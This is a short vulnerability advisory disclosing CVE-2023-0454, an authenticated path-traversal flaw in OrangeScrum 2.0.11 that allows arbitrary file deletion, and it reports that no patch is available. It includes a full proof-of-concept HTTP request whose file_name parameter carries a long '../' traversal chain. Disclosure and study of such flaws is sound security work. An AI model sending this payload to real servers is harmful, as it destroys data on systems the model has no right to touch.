OrangeScrum 2.0.11 - Arbitrary File Delete via file_name
|Name||OrangeScrum 2.0.11 - Arbitrary File Delete via file_name|
|Kind||Lack of data validation - Path Traversal|
|Rule||063. Lack of data validation - Path Traversal|
|CVSSv3 Base Score||8.1|
OrangeScrum version 2.0.11 allows an authenticated external attacker to delete arbitrary local files from the server. This is possible because the application uses an unsanitized attacker-controlled parameter to construct an internal path.
This vulnerability occurs because the application uses an unsanitized attacker-controlled parameter to construct an internal path.
To exploit this vulnerability, we only need to send the following malicious malicious request to the server.
POST /projects/delete_file HTTP/1.1 Host: retr02332bughunter.orangescrum.com Cookie: USER_UNIQ=1515f12e8e8fc20b7a103011dee82b89; USERTYP=2; USERTZ=49; USERSUB_TYPE=0; User-Agent: Retr02332 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 96 Connection: close file_name=../../../../../../../../../../../../../var/www/html/orangescrum/app/webroot/hacked.txt
Evidence of exploitation
Our security policy
We have reserved the ID CVE-2023-0454 to refer to this issue from now on.
Version: OrangeScrum 2.0.11
Operating System: GNU/Linux
There is currently no patch available for this vulnerability.
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
Vendor page https://github.com/Orangescrum/orangescrum/
Vendor replied acknowledging the report.